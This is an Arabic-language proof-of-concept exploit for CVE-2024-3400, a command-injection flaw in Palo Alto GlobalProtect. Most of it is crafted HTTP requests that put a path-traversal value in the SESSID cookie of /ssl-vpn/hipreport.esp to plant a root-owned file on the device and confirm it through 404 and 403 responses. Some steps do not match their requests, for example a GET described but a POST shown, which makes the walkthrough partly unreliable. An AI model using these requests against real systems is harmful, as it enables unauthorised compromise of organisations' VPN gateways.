
استغلال إثبات المفهوم لـ CVE-2024-3400، وهي ثغرة حقن أوامر في Palo Alto GlobalProtect، توضح رفع الملفات والتحقق منها عبر طلبات HTTP مصممة خصيصًا.
#الخطوات :
#1. تحقق من وجود الملف (0xr2r.txt) على الجهاز عن طريق إرسال طلب GET كما هو موضح أدناه، أو يمكننا التحقق من ذلك بفتح الرابط
https://domain.com/global-protect/portal/images/0xr2r.txt في المتصفح إذا حصلت على رد 404 فهذا يعني أن الملف غير موجود.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
#2. الآن قم بوضع الملف (0xr2r.txt) على الجهاز عن طريق إرسال طلب POST كما هو موضح أدناه. هذا سينشئ الملف على الجهاز ضمن المسار المحدد بصلاحيات الجذر.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r
#3. الآن، إذا حاولت مرة أخرى الوصول إلى الملفات، يجب أن تتلقى رد 403 بدلاً من 404. هذا يثبت أن الملف (0xr2r.txt) موجود على الجهاز بصلاحيات الجذر.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r